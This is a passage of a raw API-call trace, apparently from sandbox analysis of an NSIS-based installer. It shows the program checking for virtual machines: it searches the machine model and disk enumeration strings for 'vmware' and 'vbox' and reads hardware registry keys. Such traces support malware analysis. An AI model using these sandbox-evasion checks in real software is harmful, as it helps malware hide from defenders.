lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.925] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.926] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.926] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.926] lstrcpynA (in: lpString1=0x31441c, lpString2="User32::CharLower(t R1 R1)i", iMaxLength=1024 | out: lpString1="User32::CharLower(t R1 R1)i") returned="User32::CharLower(t R1 R1)i" [0157.926] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.926] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.926] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.926] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.926] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.927] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.927] lstrcpyA (in: lpString1=0x3217a0, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.927] lstrcpyA (in: lpString1=0x321bb0, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.927] lstrcpyA (in: lpString1=0x321fb0, lpString2="CharLower" | out: lpString1="CharLower") returned="CharLower" [0157.927] GetModuleHandleA (lpModuleName="User32") returned 0x76780000 [0157.927] GetProcAddress (hModule=0x76780000, lpProcName="CharLower") returned 0x0 [0157.927] lstrlenA (lpString="CharLower") returned 9 [0157.927] GetProcAddress (hModule=0x76780000, lpProcName="CharLowerA") returned 0x767a3e75 [0157.927] lstrcpynA (in: lpString1=0x3217a0, lpString2="\"SATELLITE L870-18Z\"", iMaxLength=1024 | out: lpString1="\"SATELLITE L870-18Z\"") returned="\"SATELLITE L870-18Z\"" [0157.928] lstrcpynA (in: lpString1=0x314418, lpString2="\"SATELLITE L870-18Z\"", iMaxLength=1024 | out: lpString1="\"SATELLITE L870-18Z\"") returned="\"SATELLITE L870-18Z\"" [0157.928] lstrcpynA (in: lpString1=0x3217a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.928] lstrcpynA (in: lpString1=0x3217a0, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.928] lstrcpyA (in: lpString1=0x432c00, lpString2="\"satellite l870-18z\"" | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.928] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="3228696") returned 7 [0157.928] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.928] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.928] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.928] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.928] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.928] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.928] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.928] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.929] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.929] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.929] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.929] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'vmware')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'vmware')i.R0 ?c") returned="ntdll::strstr(t R1, t 'vmware')i.R0 ?c" [0157.929] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.929] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.929] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.929] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.930] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.930] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.930] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.930] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.930] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.930] lstrcpynA (in: lpString1=0x323058, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.930] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.931] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.931] lstrlenA (lpString="strstr") returned 6 [0157.931] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.931] lstrcpynA (in: lpString1=0x3217a0, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.931] lstrcpynA (in: lpString1=0x314418, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.931] lstrcpynA (in: lpString1=0x3217a0, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.931] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.931] strstr (_Str="\"satellite l870-18z\"", _SubStr="vmware") returned 0x0 [0157.931] lstrcpynA (in: lpString1=0x314820, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.931] lstrcpynA (in: lpString1=0x314820, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.931] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.931] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.931] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.931] lstrlenA (lpString="0") returned 1 [0157.931] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.932] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.932] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.932] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.932] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.932] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.932] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.932] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.932] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.932] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.932] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.932] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'vbox')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'vbox')i.R0 ?c") returned="ntdll::strstr(t R1, t 'vbox')i.R0 ?c" [0157.932] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.932] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.932] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.932] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.932] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.933] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.933] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.933] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.933] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.933] lstrcpynA (in: lpString1=0x323058, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.933] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.933] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.933] lstrlenA (lpString="strstr") returned 6 [0157.933] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.933] lstrcpynA (in: lpString1=0x3217a0, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.933] lstrcpynA (in: lpString1=0x314418, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.933] lstrcpynA (in: lpString1=0x3217a0, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.933] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.933] strstr (_Str="\"satellite l870-18z\"", _SubStr="vbox") returned 0x0 [0157.933] lstrcpynA (in: lpString1=0x314820, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.933] lstrcpynA (in: lpString1=0x314820, lpString2="\"satellite l870-18z\"", iMaxLength=1024 | out: lpString1="\"satellite l870-18z\"") returned="\"satellite l870-18z\"" [0157.933] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.934] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.934] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrlenA (lpString="0") returned 1 [0157.934] lstrcpynA (in: lpString1=0x40ac18, lpString2="SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", iMaxLength=1024 | out: lpString1="SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000") returned="SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000" [0157.934] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f7f0 | out: phkResult=0x18f7f0*=0x1c) returned 0x0 [0157.934] lstrcpynA (in: lpString1=0x40b018, lpString2="Device Description", iMaxLength=1024 | out: lpString1="Device Description") returned="Device Description" [0157.934] RegQueryValueExA (in: hKey=0x1c, lpValueName="Device Description", lpReserved=0x0, lpType=0x18f9d0, lpData=0x432c00, lpcbData=0x18f98c*=0x400 | out: lpType=0x18f9d0*=0x0, lpData=0x432c00*=0x0, lpcbData=0x18f98c*=0x400) returned 0x2 [0157.934] RegCloseKey (hKey=0x1c) returned 0x0 [0157.934] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrlenA (lpString="0") returned 1 [0157.934] lstrcpynA (in: lpString1=0x432c00, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrlenA (lpString="0") returned 1 [0157.934] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0157.934] lstrcpynA (in: lpString1=0x40ac18, lpString2="SYSTEM\\ControlSet001\\services\\Disk\\Enum", iMaxLength=1024 | out: lpString1="SYSTEM\\ControlSet001\\services\\Disk\\Enum") returned="SYSTEM\\ControlSet001\\services\\Disk\\Enum" [0157.934] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\ControlSet001\\services\\Disk\\Enum", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f7f0 | out: phkResult=0x18f7f0*=0x1c) returned 0x0 [0157.934] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.934] RegQueryValueExA (in: hKey=0x1c, lpValueName="0", lpReserved=0x0, lpType=0x18f9d0, lpData=0x432c00, lpcbData=0x18f98c*=0x400 | out: lpType=0x18f9d0*=0x1, lpData="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", lpcbData=0x18f98c*=0x4c) returned 0x0 [0157.935] RegCloseKey (hKey=0x1c) returned 0x0 [0157.935] lstrcpynA (in: lpString1=0x42e3a0, lpString2="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0") returned="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0" [0157.935] lstrlenA (lpString="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0") returned 75 [0157.935] lstrcpynA (in: lpString1=0x40ac18, lpString2="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0") returned="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0" [0157.935] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.935] lstrcmpiA (lpString1="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", lpString2="0") returned 1 [0157.935] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.935] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.935] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.935] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.935] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.935] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.935] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.935] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.935] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.935] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.935] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.935] lstrcpynA (in: lpString1=0x31441c, lpString2="User32::CharLower(t R1 R1)i", iMaxLength=1024 | out: lpString1="User32::CharLower(t R1 R1)i") returned="User32::CharLower(t R1 R1)i" [0157.936] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.936] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.936] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.936] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.936] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.936] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.936] lstrcpyA (in: lpString1=0x3217a0, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.936] lstrcpyA (in: lpString1=0x321bb0, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.936] lstrcpyA (in: lpString1=0x321fb0, lpString2="CharLower" | out: lpString1="CharLower") returned="CharLower" [0157.936] GetModuleHandleA (lpModuleName="User32") returned 0x76780000 [0157.937] GetProcAddress (hModule=0x76780000, lpProcName="CharLower") returned 0x0 [0157.937] lstrlenA (lpString="CharLower") returned 9 [0157.937] GetProcAddress (hModule=0x76780000, lpProcName="CharLowerA") returned 0x767a3e75 [0157.937] lstrcpynA (in: lpString1=0x3217a0, lpString2="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0") returned="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0" [0157.937] lstrcpynA (in: lpString1=0x314418, lpString2="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0") returned="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0" [0157.937] lstrcpynA (in: lpString1=0x3217a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.937] lstrcpynA (in: lpString1=0x3217a0, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.937] lstrcpyA (in: lpString1=0x432c00, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.937] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="3228696") returned 7 [0157.937] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.937] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.938] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.938] lstrcpynA (in: lpString1=0x40b018, 